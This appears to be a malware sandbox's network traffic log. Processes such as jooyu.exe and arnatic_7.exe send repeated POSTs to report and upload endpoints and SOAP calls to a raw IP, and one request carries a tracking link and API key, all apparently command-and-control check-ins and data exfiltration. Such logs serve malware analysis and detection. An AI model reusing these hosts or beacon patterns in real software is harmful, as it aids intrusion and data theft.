                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:26:57 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b6257300001bbd17af4000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=dicm%2BntykyRksBFJnYcbA8d97kjkEe5SqkTRf4LgWhPvB0IW1ftIqnlzN97LbF8De94niKoGuhaVwdsSTNVBq8jH4YgxfeD4KDd8%2BdMTz2c8e6XBxrqkTw%2F9bxjX0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686261beb521bbd-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:27:08 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b64f38000001151039b000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=T%2FNdPx0Mwe0Tr67ZfHJn05I3fsx6tRpMAqKahhacvGb%2FaYQPEIurSjdDF0JYKcw6RHssiQ%2FYVwCjdu1HInpFlrWyCoE8zkSyKz%2F7EUH%2BH7KefjD0HZxe%2FwNs2a4%2FVw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686265eca900115-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        star-mini.c10r.facebook.com
                                                                                                                                                                                        star-mini.c10r.facebook.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        157.240.201.35
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://www.facebook.com/
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.240.201.35:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET / HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        viewport-width: 1920
                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                        Sec-Fetch-User: ?1
                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                        Host: www.facebook.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Alt-Svc: h2="facebook2futmrduts5uqn3ahwg4qyqoks6h3alxf5drhsgyhzujyqad.onion:443"; ma=86400
                                                                                                                                                                                        x-fb-rlafr: 0
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                                                                                                        Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                        Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                        X-FB-Debug: MaVE6nvP8rRmABZACd0oaEelxT3PKJpKoZzJRylcUpwI22WNhGHLAz83tnlsf9aPKZc1y2zS53rRh9hl3X1thw==
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:27:19 GMT
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:27:18 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b6779c00001649c8151000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=ZOkYBywmUImDjPCqZQonu65auMFv%2Fvup5ArJeVueQztwXCP%2BcLNtABK0OfHxBXhJqo%2FmbROarf5aBUNWHEZPA7ePUf3JhMx1GRjEYtPXbpdp%2BpIGeD1voG2D%2Fopyww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686269f6b4e1649-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/fbtime
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.218.92.148:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /api/fbtime HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        Host: uyg5wye.2ihsfa.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:27:20 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Powered-By: PHP/7.3.21
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/?sid=294941&key=932c845d57a1c057ea8918c49d9c66f3
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.218.92.148:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /api/?sid=294941&key=932c845d57a1c057ea8918c49d9c66f3 HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        Content-Length: 266
                                                                                                                                                                                        Host: uyg5wye.2ihsfa.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:27:21 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Powered-By: PHP/7.3.21
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://iplogger.org/18hh57
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.99.66.31:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /18hh57 HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        viewport-width: 1920
                                                                                                                                                                                        Host: iplogger.org
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:27:21 GMT
                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Set-Cookie: PHPSESSID=snhtmh2qamjn9gq3g49ho9kti4; path=/; HttpOnly
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Set-Cookie: clhf03028ja=185.220.100.250; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253837350; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        Answers:
                                                                                                                                                                                        whoami: 5bd0344d526f94fa91bccbdc276a5eb28683c99000fe0344320eae785ca59dd0
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:27:29 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b69f8d0000415010866000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=FYWCdW6j7JQj51CflgtRX2Jns9m4h%2FGjr4VVhh7Frm1Fh5z5%2FGtBgKiukmC9S%2BK1c7rKgvireHH0DC2%2FJIRyT3N19cnRBgvPLNsZdIZGTNyjuWXU2DwIN2gXrz6RPQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668626df48604150-HAM
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        90.191.200.51
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        116.126.116.6
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        118.33.109.122
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        190.146.154.18
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        211.108.106.8
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        116.58.10.58
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        115.91.207.131
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        118.130.34.112
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        190.190.202.13
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        210.207.244.101
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        210.207.244.101
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        90.191.200.51
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        116.126.116.6
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        118.33.109.122
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        190.146.154.18
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        211.108.106.8
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        116.58.10.58
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        115.91.207.131
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        118.130.34.112
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        190.190.202.13
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        90.191.200.51:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 299
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:27:30 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 7
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        90.191.200.51:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 164
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:27:30 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:27:39 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b6c7ad0000fa1c3fa43000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=j13MtJtpGynDm0OmZMza01mmBtVhbVXrUHiojn2X59D1IVTTdtw2%2BOdDAJnmFJvf%2BveS0JdQHonrMD1iXNUPMkzLcBAO3phgmG8I9JnjBswGySQeJdLLrlZsiUcMIA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686271f7a38fa1c-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:27:49 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
